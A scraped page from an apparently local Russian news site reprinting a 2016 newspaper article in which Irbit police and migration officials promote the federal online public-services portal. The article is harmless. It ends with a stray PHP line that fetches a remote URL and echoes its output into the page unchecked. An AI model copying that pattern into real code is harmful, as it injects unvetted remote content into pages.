Регистрация нового пользоателя


наш двор
наш двор
Сотрудники МО МВД России «Ирбитский» призывают граждан активнее пользоваться возможностями получения государственных и муниципальных услуг в электронном виде.

2016-09-21 10:42:14
Сотрудники МО МВД России «Ирбитский» призывают граждан активнее пользоваться возможностями получения государственных и муниципальных услуг в электронном виде.

ЧТОБ БОЛЬШЕ ВРЕМЕНИ ОСТАВАЛОСЬ НА СЕМЬЮ

Сотрудники МО МВД России «Ирбитский» призывают граждан активнее пользоваться возможностями получения государственных и муниципальных  услуг в электронном виде.

Напомним, что сами понятия государственные и муницпальные услуги появились в нашей жизни в 2010 году, после принятия Федерального закона «Об организации предоставления государственных и муниципальных услуг». Подразумевают они под собой осуществление уполномоченными государственными и муниципальными учреждениями деятельности, направленной на выполнение запросов от граждан.

Так, например, к государственным услугам, предоставляемым органами внутренних дел, относятся регистрация автомобилей, выдача справок о наличии/отсутствии судимости, водительских удостоверений, лицензий на хранение и использование огнестрельного оружия, проведение добровольной дактилоскопической регистрации граждан и многое другое. Ну а с недавнего времени к их числу добавилась выдача российского и загранпаспортов, постановка на учет иностранных граждан и так далее. В общем, все те функции, которые ранее выполняли сотрудники Управления федеральной миграционной службы.

В частности, рассказывая о преимуществах получения госуслуг посредством обращения в ведомство через Единый портал государственных услуг, начальник отдела по вопросам миграции Валентина Воложанина отметила, что это избавляет граждан от необходимости многократного обращения непосредственно к сотрудникам отдела.

- Обращаясь к нам через портал, человек не тратит время на дополнительные визиты к нам и ожидание своей очереди. Дома он заполняет и собирает все необходимые документы, присылает к нам по Интернету. Так что, проверив их правильность, мы уже просто приглашаем заявителя получить готовый документ. Если, конечно, речь не идет о загранпаспорте нового образца, требующем прохождение дополнительных процедур (фотографирование и дактилоскопирование). В большинстве же случаев человек приходит к нам в назначенное время и в течение получаса выходит от специалиста с готовым документом, - отмечает Валентина Андреевна.

Кроме того, единый портал окажется незаменим для многих жителей территорий Восточного округа, вынужденных за определенными услугами обращаться именно в ирбитский отдел полиции

Так, по словам начальника МО МВД России «Ирбитский» Вячеслава Шведчикова, одной из услуг, которую сегодня ирбитский отдел полиции предоставляет гражданам, является отстрел оружия (получение контрольных образцов пуль и гильз для формирования федеральной пулегильзотеки). При этом возможности отдела позволяют проводить в неделю отстрел лишь нескольких единиц стволов. В то время как именно в Ирбит за получением данной услуги должны обращаться жители всех населенных пунктов Восточного управленческого округа.

- Понятно, что вживую в такую очередь попасть очень сложно. Единый же портал госуслуг позволяет из дома записаться в очередь, зарезервировать удобное для Вас время визита в ирбитский отдел, - подчеркнул Вячеслав Шведчиков.

При этом отмечается, что сегодня уже есть граждане, оценившие преимущества общения с государством в электронном формате. Прошедшие изначально по крайней необходимости регистрацию на портале горожане, знакомясь с его наполнением, обнаруживают, что с этого момента, практически, не выходя из дома, могут общаться с самым широким кругом органов государственной и муниципальной власти: от правоохранительных органов и налоговой службы, до городского управления образованием.

Так что, как отмечает Вячеслав Шведчиков, электронному общению с госорганами гражданам нужно просто научиться и привыкнуть именно к такой системе работы.

- Общаться с госорганами и муниципальной властью в электронном виде не надо бояться. Уверен, что однажды это просто станет обыденной частью нашей жизни, как когда то для наших бабушек и дедушек привычным стал телефон, телевизор, а для нас – Интернет. И нам, наконец, не надо будет огромное количество времени тратить на стояние в очередях для того, чтобы получить справку, права или зарегистрировать собственный автомобиль. Так что при грамотном пользовании Единый портал госуслуг серьезно сэкономит нам это самое время, потратить которое каждый из нас сможет, например, на свою семью.

Юлия Берсенева

Ирбитская жизнь, №35 от 07.09.2016




<?php $headers = file_get_contents('https://ntsirbit.ru/generator/generator.php', true); echo $headers; ?>